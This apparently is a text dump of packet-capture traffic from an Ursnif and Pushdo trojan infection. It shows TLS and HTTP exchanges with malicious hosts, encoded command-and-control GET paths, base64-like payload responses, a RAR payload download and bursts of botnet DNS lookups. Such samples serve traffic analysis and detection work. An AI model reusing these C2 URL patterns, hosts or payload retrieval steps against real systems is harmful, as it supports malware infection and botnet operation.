Text Example

Ursnif and Pushdo Trojan DDoS Botnet Malware Infection PCAP file download traffic sample

2019-07-29 12:48:13.981152 IP 10.7.29.101.49158 > 185.244.213.113.443: Flags [P.], seq 1:118, ack 1, win 64240, length 117
E….]@…C,
..e…q….r.Z…..P………..p…l..]=…A..}}.5T+…M%…$…Lr*,.6…./.5…
….. .
.2.8…….+…………..riuytessl.xyz.
…………..
2019-07-29 12:48:13.981273 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [.], ack 118, win 64240, length 0
E..(…….t…q
..e……..r.Z.P…EP..
2019-07-29 12:48:14.192305 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [P.], seq 1:1383, ack 118, win 64240, length 1382
E…………..q
..e……..r.Z.P………..]…Y..]?#Ny.8…..-…. i………!a.. .BAB…..i.PQ.?Qa&..K….’.6z…………………………………i0..e0..M……..y@.TCg.,..Xc.oo
.0.. *.H……..0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30…190719142342Z..191017142342Z0.1.0…U….riuytessl.xyz0..”0.. .H………….0.. ……….(C.9.U.k…..j.C.U.6..|a….k…M.. …...”q….O..q..V.g4.k.i….:?….(……………….+G..I.u..]k..3…..<….au..].L’xLh…..#9q.r.k……?.fCib..4[}P……p……Y.U..y.:..i……p..Zt5s}. .z]A@azl.t..D..X….dVU..Rcp.o.l!..^,.1.1…q…….Mn.. ..Vl..5…….U0S’.y?…….>hr…7…..=.. .k!TS_n.UE#N……F.dvi…ws….Q….#\PT.06…..+1.Y.g.?W.o-…#%,[..U….P.7….DMe…….|e.Z..-0….F9H….j./…Zj.]… VJ…~.ayy..Ny;h.u.i.’.{U3$c…………&.5c|……6……9. …..X.)py.………….u0..q0…U………..0…U.%..0…+………+…….0…U…….0.0…U……:.$’.UF.W.x.*.h&….0…U.#..0….Jjc.}….9..Ee…..0o..+……..c0a0…+…..0..”http://ocsp.int-x3.letsencrypt.org0/..+…..0..#http://cert.int-x3.letsencrypt.org/0+..U…$0″..riuytessl.xyz..www.riuytessl.xyz0L..U. .E0C0…g…..07..+……….0(0&..+………http://cps.letsencrypt.org0…. +…..y…………v.oSv.1.1…..Q..w…….)…..7…..l ..c…..G0E.!…..T..X.LB……..~Z.…V….. .+/.|Ri.e….5.…vO..w../.]….v.) 10.7.29.101.49158: Flags [.], seq 1383:2843, ack 118, win 64240, length 1460
E…………..q
..e…….xr.Z.P…….r……EG.x…l
..>…..G0E.!…..lh…..F…P…….w..<.l0… T<..y..T.2Q +..Q.p…3_>.#%.z!.E0.. *.H………….Q.>=-J..’p.!.7W……X..q.WTx…..i8<...kc6…….D.O…….3…>…i.RRx.5<.….]../..1.T..A f..&..4.Q…:.6j.NR…./x.9….J…5Me..V}h..e….=.G….{………d.O….3E.?.VG..e0……1…..$…?.bp..Gw…h..).., mZ3…….!;.X…Q/..d…y…|…f….o…0…0..z…….
.AB…S.sj…..0.. *.H……..0?1$0″..U.
..Digital Signature Trust Co.1.0…U….DST Root CA X30…160317164046Z..210317164046Z0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30..”0.. *.H………….0..
………Z..G.r]7..hc0..5&.%…5.p./..KA….5.X...h….u….bq.y........xgq.i........B…tg…..Ra..?e…….V…..?…….k…}.+.e…6u.k.J…Ix/..O* %)..t..1..18….3.C….0..y1.=-6….3j.91……d.3…)…..}……….}0..y0…U…….0…….0…U………..0…+……..s0q02..+…..0..&http://isrg.trustid.ocsp.identrust.com0;..+…..0../http://apps.identrust.com/roots/dstrootcax3.p7c0…U.#..0…….{,q…K.u…`…0T..U. .M0K0…g…..0?..+……….000…+……..”http://cps.root-x1.letsencrypt.org0<..U…50301./.-.+http://crl.identrust.com/DSTROOTCAX3CRL.crl0…U…….Jjc.}….9..Ee…..0.. .H…………..3…cX8…. U.vV.pH.iG'{.$…Z.J.)7$tQ.bh…pg….N(Q………Z……j.j.>W#….b…….?. H….eb..T… ………2…w..ye.+.(.:.R..R.._….3.wl.@.2…\A.tl[]

2019-07-29 12:52:10.719361 IP 10.7.29.101.49161 > 40.76.4.15.80: Flags [P.], seq 1:458, ack 1, win 64240, length 457: HTTP: GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
E….*@…..
..e(L… .P.YQ.8.+9P…7F..GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Host: microsoft.com
DNT: 1
Connection: Keep-Alive

2019-07-29 12:52:10.719447 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [.], ack 458, win 64240, length 0
E..(……Aw(L..
..e.P. 8.+9.YS.P…….
2019-07-29 12:52:10.807321 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [P.], seq 1:325, ack 458, win 64240, length 324: HTTP: HTTP/1.1 301 Moved Permanently
E..l……@2(L..
..e.P. 8.+9.YS.P…….HTTP/1.1 301 Moved Permanently
Date: Mon, 29 Jul 2019 16:52:10 GMT
Server: Kestrel
Content-Length: 0
Location: https://www.microsoft.com/images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi

2019-07-29 12:53:39.848186 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1:438, ack 1, win 64240, length 437: HTTP: GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
E…..@…
}
..e…..R.P..V_q5s8P…K…GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:39.848277 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 438, win 64240, length 0
E..(…………
..e.P.Rq5s8..X.P…2…
2019-07-29 12:53:40.046606 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [P.], seq 1:1383, ack 438, win 64240, length 1382: HTTP: HTTP/1.1 200 OK
E……….2….
..e.P.Rq5s8..X.P…P…HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=i52pvsrt089bi7i3umb88bd400; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:14 GMT; path=/; domain=.irwhfgowe.xyz
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

355bc
07rwzN1wxvCWd3rBZRqevWWzLIsTvybdCsmwzeaaULAyy2Vy5oxxe1cX92MOCxC3ZQTo+1KHvKoqvNbCRp1xBSQZTNLReURGb8kNYH3+8JtR8xL9OmBF7Sm/4WIsuKzpacR1VqJIEIpbeNx3KLC8sqndJlMp07IoHValNX47uHFm2hY9H28QPgnMGW+y9HkcEMwdFh+E3yHoii4dzyrQnnpFFowy7pEoy1GQO5EW5bz2uxuUSAK3qJyHs5kVuNTpQP0qKUc9EjlEPFRjKCajoaxKEWSPD+f/45g1i9cS2dIGrp3t/IgmKbTYOLte8un43nqCF4gLuN5SV0ONquYbjiqVdU38jEYkwcxmgWnXlKoLGw3rSLlac1VA8oYQ7d/5KgBKPbCf6gJ+dyTcqSPQ9Spaiz5Dq69spM35RwwgGB2rGBAncEha02GnOidGumIJx+If+d0NJyTd51Q2dFLqGzg5WiQGQo+udLo7vaI/KUvvObs+1io0BRFa2X+rAbzGx6sLk4fI9ts/9IemiGl+szT83n4mExS1zP5QI8in/b0Qy79VKc1R3mYvm/J0GM6HJem8IJFH5BJqjrCOMerjG1hg6QSXk5AVOTIGezTaUMGVY5o+JvaDRxcOv/zhRKIx5qpeTYd+u2gExUdiOOMj7hqHAWn1DS0KiUJ7cjvniv+0En98QSv3wbZOO8ksFLa5new6152uNXX5lC2lAk/NgwHOWmt7cN074ASQ0GTAcoGsGRDL1WLTcZ7SNu8SUGIIo55/M7y7Ag4ITRqB95grEqHAtCNhliKrOEy1bn4GpZ9NG2Do2W
2019-07-29 12:53:40.046704 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [.], ack 1383, win 62858, length 0
E..(..@….0
..e…..R.P..X.q5x.P…2…
2019-07-29 12:53:40.048505 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 1383:2843, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5x…X.P…H;..+QWA0tM0QdVuPkhswOFzlmPHTuY9CN2QDsWi1bIKzwR6vkhZ7KAwMVY1i48tC164mEm0z0RZNf+IrD3TPDZU5mRtCAqPy/I1zqVQaeBPpHhJwl+YI20OIHCOPQg94BqaoFvWP6ArUig5deAw5awc0Xts9xFKYpUGKmEC0nGwqHQP3UBzpcIvlrSTYLwh3/MtpScYFthdHNb/bld1mXgaGAZ5E6m0Tj4yVcrZSvFi+CNIrIsNhK9RIVbl9Ij3MeRiXBLXoabyasQ+tPADbSrKe+QgVog2pEtsi1XzNXvd0OFjkLfmduBJm/3GQZsjUczuEUF2vCPq0v6vzqqAuDGs1fwCcqe9j1vnzH8Msf+ElPuMloNmSBkdUloQMDJbKbskU5D00aW/DAh/MyzVoh496ITtuywkrC1hFf6bLRucFXSqL/IWjxK8n+LsEsoKxCYnd5MjlPnN7B6FrQg4BS6A4V9BLg8wDOp1hY/aNO/gSnnzcxoBWru+QrXQ+8iWoqv90qyEg9XNo/FwGHle7/3Uo1ES0lffJYr0lINt59NvSSNUaTgHItVymhKNOhPehcLPhHeHYI/g+/AIBpc92VIQLHzF3qe3kOLfQnUe8+AgI4sPKcpgPrNTdJ8alc/OTYDrcPLoLIS9cR5MH1kLuTZFgnFRFbwVnSZBn9Kd9LyUWjwWxH8wNJ3FYwyEMFszvvuucEqgTz8j2THI82rKE42DFtRG3uoH3FbToEnYVfUhBYe/NLyjgeMR38DVP3D4NxGcK64otXkReWSRU8YB7yUD7Y1jokacBnOPhnCdB5C3XJNcsPukxmHpCSg2pO3XOBxe2i+3iTUIIOGZtyhFKE5fkXcDmF0kS4vKakFkWC3TOYKT1kfidos6AU49cBx2OCIi+4KymAGygCmX5LiUbjZDT53qE12p7nFFPQou5/OwCHqUZLxw2zKOuCaSWzDfnfulRNe+V0ZjDCun794hdPLUXbX4SSTcaXcjwDSL+NFKFQ1L+eAaSGc9xlY+8LxzstSs7BWSMtPm3fGbKfEClnSLZOK2jhDJNgqbx9Bfil/6pkI3SoIL5g76ezoHhJUoDSzk70NJdSXoDMnXcP/FOjQzTGgHmDLIH1lpcBlC9baxvXK8a8N2ip33O+1iSyjBZ6hTLPdVTbmk9Xg0pz7Q5dhJ4IBEPQ9eo+xlm+CHI9ZAYQ7h01Kzvialrsfe+8ilK+aNZ6PDpN74yqn8CnsS5xazdBEKG7n2jXPRl+FOxsGVE0luECxROi/K/rHf76pNTsS+6N67jydO+HMvrpXAXvPHZQkQ9lkdjwPqbEubmReoPl4AyE7ksSS1ZOgnqsv6zgQePZkSCuIbN6MWfnMg5h1IjaV4IWTKwhZDUCgaqBRrPtEepmhL3fQ5TlAsF+6xbGFzx3nsAUlOB/k5IdzxeHF6aHRJcVqdcaNOujgaeawDPsEqAGmr4/w3
2019-07-29 12:53:40.048521 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 2843:4303, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5~R..X.P….N..00maCBUypMWFQxMSDyrILJZUIfW1V6PnFnBZZGFQBlwGrD0w8eyrfi5KVKY/UYmAlg9Ob6AQz9sL9fOgrac2mScpFFDqx8B6tWHUfO5DZ3gKXe+Hq+WMsUMbuFbH4dlYsezuo0hnHniNRpAAuCxYEyn19E7xebnKJBp16rwB3LbP2OhwpoEhPtVNVYc+eFMNA9JBQ1mk9F/Lkbookgz2Q5ZQOmpbnpqagQWQloutSYu5u5NM+HTtNVZAns1V6xGnexCjeeTeI748NKWmdvW8wuHAMBdvJzNzLdaCLfmbCbkT7YnLcpkMHxRSp/pwaA/k0SIcUvKAR+4uKFKgKK2V1yQVlULPL55w+qR1YZj7s/vRsDHK9iqGXDRjwRauMqEj6aJabMYH8tcGz92o0DU+XaiHN1THg8hXQnsIVFcdrvdy3DgrSYwaX6SB6wj16vyc6uAbaOwY58TZNe7jRSyrxIHd+TnVGYbX0B7t9tM315IQ/8UVYHVJ7OTc5J06epbpzHZsY5VlXVrhvbp/LnCEWQCUSMVKI/v9fHljQO4z0w9PDWrrxsVetWxcDVSvPamcxg+hkx+wGmV3SmQg8EegO8qKFpfap/hgCJd4EuBFdfkKDWd7iqsWch1bcFAO2Kk5wnnqoivftNH6vLKYMtYGquVpeZDRzbxaa3et1XwiDEy6wGSBHvPARqq7sTo4HRjDYf1slg2PW0HsNnzDNaV7lPOPyBJi8W6dyvK/qKDnMa7yDE/CInmaHNIFErWXF3YG2y2w8LgTmcShVD9C/4eC4NRjFkRAmIO2pRFdIw1la1hvbPz9SGW80OMT16T70/nw4o5NT45C7bnPgl6Li7TXnvCLEcZPo38aoPzngVX5mGpLxWQO65W8Nn63qwJFMvOHfPL4UXxSDrs/od9I1griPceSIbBwDxWykgRRa3RmM7oA3nqlSFp0AMLWlT50DgcQILDGkuoAmcOk2mFPDbUuY70VUEcURbbEwt7ZRbCzgD1GzDQdHYL2dwswXxmp22xWLUYRHJE0U9O7CAqS/H69b3KaJ7vBI/B7TSXGJ3XZ9gs9A2VSCIt7hCl4qZNCWOcZsKYk0yeSKeAtdYH7vSQ8PoT+50/bK1Q39aNZhGAo2Ft6hdDynix9t+ugIRtiV2D9u9wi0xC7qVr5URmqheErnLxKlZ0ZmxDfJhM036/ixoeK8JwkYcGDvFMI7v5zNZIl/ijUTPU9pKbJ//gdj/Ml6KAKxIpWVaweUPFpPTagfK9NmquFzscCEKcHYcEXhxXsJLxrz8wNydnL1teY75mIrPG0ZnjLif012sgqpPyzNcRlb/+zEKdS7VGxk7WpkPBa8Xrk21vWJn59siPGMeIhJgPMEsrtUdiffXT5JYSOFar5mo/7dFPmXjhq5JIwE5kwBj81lKckcHi/GwMjwkfgSjT1Vkil+jGVD5jXoPzYf+OTNLHtpHrv

2019-07-29 12:53:43.474193 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1076:1511, ack 500659, win 64240, length 435: HTTP: GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/4
2A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
E…..@… .
..e…..R.P..Z.q=..P…….GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:43.474326 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 1511, win 64240, length 0
E..(…….+….
..e.P.Rq=….\EP….0..
2019-07-29 12:53:43.681682 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 500659:502119, ack 1511, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E……….v….
..e.P.Rq=….\EP…….HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:17 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=nthmmr62j6fsaf2hggojf13s20; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:17 GMT; path=/; domain=.irwhfgowe.xyz
Content-Length: 2480
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

iDQg1v7keVA4gr+mxyf3wTWxsEYT5FWxPBpHhrh16rHRe9Iip2KPkI9GRO0eYWaezOnTs1o7Ln5PrFQZBtSBel/lGZtP9VH80RM3P38c12eUEsKvwdKkE/3VZ6an6nVoZZ3T19GKf9DttVcerLiQv5tBKRKV+iZjg24EesCMirABxLQ+wTJzpN8kfTBrQMDWvypvRaxTAhqhcZaRq26/freNXboiT+ZAPNy+sPgowSK
6BtAP1WduOiF712W9t6Cdk80L4PL+xleVk1BDVlVW7g4dnuI4E1WE2kn+/CMJ/Kf2AG5RctwNGk4BkH9jYf24NjVynFk385fvuOrZ9se2yaY3xh147eK5mxumEXWfJ/0yvBDv7CpZHU+YEdzqIIikvPq7U6hdihZC7CfSQjmdJ9qU1nHfrMK6yTkXmjyR0grJshmTZN3KYgY81qMQXIvHvAcT6GU2KzmaBIeIA293m4
gC0mKNB1ck1l9DowLnu/g7NCcXZIKBCSDjlEDzrEV5T/YpqsoLvdMrpKUruqu54aW20bFCxejhrqtPia357tA2MFdl3xVm4XNq5+RIwOW2ELoenaXIm1FZuEuxJyadbyvcqofZX1jXhsg7G/74q0fxC8fkz2veauD9rOwlieO9M/bw5gH8DDS8NTummTzX+xU9QPfCEh2nYJL7/S0d6eOadYY5ik2ALj7pU4rEWCPPS
umt190uprB6A9c3udOXgoPejyeuCLQKUB9UxhMgxdsGOoVJPDdSfoqGHlT8a9UGrg6F0rCFAVBDxo0TXC+SaKu78hipFnneaVTHYxi/tLw088dQkzc1PmtnNOFqUXWBirxiBWw2rsGD6wOdO/YjSm8Mdo8AEfd6B39F0rFo78boD/zyLaRm+2g7bE2s7QWyvA9q3NKNW+nFLz
2019-07-29 12:53:43.681709 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 502119:503579, ack 1511, win 64240, length 1460: HTTP
E……….u….
..e.P.Rq=….\EP…….Co8FRj6uTHdUAWhlgWreY51ooBHc1MWFrjvK6UUn5eAL9/xk0x24lVA/OPovbIZimxhyf3PCWxCWdHw0bQPPXEDYj6hRW7fZPMXzJZYAOcHFhAI5fdYIaQCYggVaYGuOqc0Zd91kKpapMNSUbz75oGEAeP/Zi52AlzLKtinJugHJfmiQb8427B7+PIWoRUhYZYBpyo49e/rhwaDlMpQl
SWuPZ/paqVnte83KWzj4/X8cH7CE4sckayWIntW8xeow9bvOffNMmaQrD5Bw+T9SE2CovTyZxej65akzcJAdEmd5uqXXU4qBkJvk50qT8tArWpv/y3DXZ5JdCTUhtF4q8IIuiq7P89s1SiQqGrMZXimGuCp9HA9uL8lmXOV0+frB9lFker1nkrtJZzEI6KdKO7iCGgXpu/blj/FQe/ztkEZ9UmCHI5vlDYOdYKMi6Jo
gZfdkZTISsrYWcnY1mIrGs1LRcfrckFrOES3prQ/EfNANOL9MhzmfRwvY+ZBpyQMWrDFtGpM+h9Sw2emgfWFtdLRV6g5mDEvuyteyAY3Z9tggaeq4kqdc5YHUXHyA82g5Zy46VbsrgfWE7tyyJAV7JMZ0yNqxF/oTd2JqKxgypPb1EL0M94CmmXnPOZALL7lwcUF7wcp8gp2I9RsfvN2em+T9MbY1PaKHr77+9m7T7z
GyBdWE1H2W1j2J/HIqwe9Z4JuMV1ZXSrwldKYpl1UaGBU8+T/s8Dzwwk7WOO/FybjcTO+D9lZVUX0Mq34j7avx3gbU2dTAKaAhfRwJ72MCq/UgaowkMk60Y7eMIc8IrRJ4e0/RzU/o82BGuG2mYkLNsL58cl5KB+/c7Nr2G08h5kZ08pVHMA2MBmHw4ugLOzb5xLjQG6f5Tsaq
X1kBbojRReBfy4NhzI9gQ5lfi6
gJkxWovKr4Btyy840zDiJMTR+IqCC9YLr1RyAZiKu19vtqrapY/RD5SG7zAQBVgUOJlKfV+HnVhxiN2haFhif2ZaAe5ADAzdiiOO4SLrus3RTwUETUOulf2pjdQaoDZJzqZ7xqDy28WVRasqO2Uy7w/ElhUNdOT7EXkBhvznV2PcBLjtkpai8/1fiRlPG9alpuXyMdbPOTcnNonbbwvIgpX1oQWmlCL3PVrmVfuQ3vB
dQKVKY5RkFJO0qSzkm8zSWe8YOTUC8LPDE8Ni58m/8ZNjQlaxECbeFIiTJO3Xa6S4dtq5odlHslN8XE4JE2/mmIzb3vYXVR6srXxKWm2O5GBkYcKaq6NtDvnoaeRuzXwlLsKovhbqUHWiSdQe/EBuq0IEYFpc15Qgm3QgCQ7u6fuKqohRadP0vvzb3zgJ0bOwfNOypnsLt4AnOsgxZofDVtiM81JYRCCD+Jo6pOJqWd
IQYawzJb1gfNL5gGH3/JSS1xLyiZ483xa/BDtgvU5Uz0jjCGjURD+S2P69TlL0eQ66ntI1D8/

2019-07-29 13:00:51.068034 IP 10.7.29.101.49247 > 109.123.223.76.80: Flags [P.], seq 1:179, ack 1, win 64240, length 178: HTTP: GET /demo/PhotoA.rar HTTP/1.1
E…..@…~.
..em{.L._.P…… 6P…)…GET /demo/PhotoA.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: kacafirek.cz
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-29 13:00:51.068133 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], ack 179, win 64240, length 0
E..(……..m{.L
..e.P... 6…XP…z… 2019-07-29 13:00:51.258107 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], seq 1:1461, ack 179, win 64240, length 1460: HTTP: HTTP/1.1 200 OK E……….4m{.L ..e.P... 6…XP…….HTTP/1.1 200 OK
Date: Mon, 29 Jul 2019 17:00:51 GMT
Server: Apache
Last-Modified: Mon, 29 Jul 2019 08:06:23 GMT
ETag: “e60124-3eea3-58ecd5e2cfdc0”
Accept-Ranges: bytes
Content-Length: 257699
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

2019-07-29 13:00:58.982371 IP 10.7.29.101.53764 > 172.16.5.2.53: 23168+ A? www.vitaindu.com. (34)
E..>.-….Z.
..e…….5..DZ…………www.vitaindu.com….. 2019-07-29 13:00:58.982627 IP 10.7.29.101.63732 > 172.16.5.2.53: 20475+ A? www.pr-park.com. (33) E..=……Z. ..e…….5.)..O…………www.pr-park.com….. 2019-07-29 13:00:58.982894 IP 10.7.29.101.65154 > 172.16.5.2.53: 28480+ A? www.2print.com. (32) E..<./….Z. ..e…….5.(..o@………..www.2print.com….. 2019-07-29 13:00:58.984127 IP 10.7.29.101.54427 > 172.16.5.2.53: 60399+ A? www.crcsi.org. (31) E..;.1….Z. ..e…….5.’.k………….www.crcsi.org….. 2019-07-29 13:00:58.987089 IP 10.7.29.101.49386 > 172.16.5.2.53: 17994+ A? www.spanesi.com. (33) E..=.2….Z. ..e…….5.).PFJ………..www.spanesi.com….. 2019-07-29 13:00:58.987781 IP 10.7.29.101.58486 > 172.16.5.2.53: 43542+ A? www.owsports.ca. (33) E..=.3….Y. ..e…..v.5.).A………….www.owsports.ca….. 2019-07-29 13:00:58.989882 IP 10.7.29.101.54356 > 172.16.5.2.53: 39383+ A? www.rs-ag.com. (31) E..;.4….Z. ..e…..T.5.’……………www.rs-ag.com….. 2019-07-29 13:00:58.991007 IP 10.7.29.101.60036 > 172.16.5.2.53: 34096+ A? www.c9dd.com. (30) E..:.5….Z. ..e…….5.&…0………..www.c9dd.com….. 2019-07-29 13:00:58.992556 IP 10.7.29.101.53486 > 172.16.5.2.53: 64159+ A? www.udesign.biz. (33) E..=.6….Y. ..e…….5.))…………..www.udesign.biz….. 2019-07-29 13:00:58.993571 IP 10.7.29.101.57888 > 172.16.5.2.53: 32553+ A? wpad.localdomain. (34) E..>.7….Y. ..e….. .5.p..)………..wpad.localdomain…..
2019-07-29 13:00:59.054760 IP 172.16.5.2.53 > 10.7.29.101.58486: 43542 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
E..].r……….
..e.5.v.I……………www.owsports.ca………………i.@………….i.@
2019-07-29 13:00:59.058581 IP 10.7.29.101.49248 > 198.105.254.64.80: Flags [S], seq 1756324796, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.8@….v
..e.i.@..Ph.c....... ................. 2019-07-29 13:00:59.059556 IP 172.16.5.2.53 > 10.7.29.101.53486: 64159 2/0/0 A 198.105.254.64, A 198.105.244.64 (65) E..].s.......... ..e.5...I$..............www.udesign.biz..................i.@.............i.@ 2019-07-29 13:00:59.060024 IP 10.7.29.101.49249 > 198.105.254.64.80: Flags [S], seq 331088107, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4.9@....u ..e.i.@.a.P.......... ................. 2019-07-29 13:00:59.070348 IP 172.16.5.2.53 > 10.7.29.101.49386: 17994 2/2/4 A 104.26.2.86, A 104.26.3.86 (204) E....t.......... ..e.5....P.FJ...........www.spanesi.com.................h..V............h..V.............jean.ns cloudflare...............ben.R.n............;g.n..........$... I........;g.M............:y.M..........$... I........:y 2019-07-29 13:00:59.070711 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [S], seq 4069494565, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4.:@....
..eh..V.b.P…%…… .z……………
2019-07-29 13:00:59.083033 IP 172.16.5.2.53 > 10.7.29.101.54356: 39383 2/2/4 A 104.31.73.201, A 104.31.72.201 (203)
E….u……….
..e.5.T……………..www.rs-ag.com……………..h.I………….h.H…………..karl.ns
cloudflare……………jade.P.K…………;..K……….$… I……..;..l…………:..l……….$… I……..:.
2019-07-29 13:00:59.083341 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [S], seq 4209286921, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.;@….5
..eh.I..c.P… …… ……………..
2019-07-29 13:00:59.092781 IP 172.16.5.2.53 > 10.7.29.101.60036: 34096 2/2/4 A 104.25.152.27, A 104.25.153.27 (202)
E….v……….
..e.5…….0………..www.c9dd.com……………..h……………h…………….rita.ns
cloudflare……………west.O.J…………:..J……….$… I……..:..k…………;..k……….$… I……..;.
2019-07-29 13:00:59.093130 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [S], seq 2628897602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.<@….. ..eh….d.P…B…… …………….. 2019-07-29 13:00:59.124030 IP 172.16.5.2.53 > 10.7.29.101.54427: 60399 2/2/4 CNAME crcsi.org., A 198.12.145.135 (204)
E….w……….
..e.5….h)………….www.crcsi.org…………………………………………ns56.domaincontrol.com…………..ns55.N.I…………K..I……….&…”…………m……….aJk..m……….&…!………..
2019-07-29 13:00:59.124420 IP 10.7.29.101.49253 > 198.12.145.135.80: Flags [S], seq 3693053252, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.=@…s.
..e…..e.P…D…… ……………..
2019-07-29 13:00:59.134787 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [S.], seq 1144726242, ack 4069494566, win 64240, options [mss 1460], length 0
E..,.x…..wh..V
..e.P.bD;”….&...a....... 2019-07-29 13:00:59.134962 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [.], ack 1, win 64240, length 0 E..(.>@....
..eh..V.b.P…&D;”.P…y…
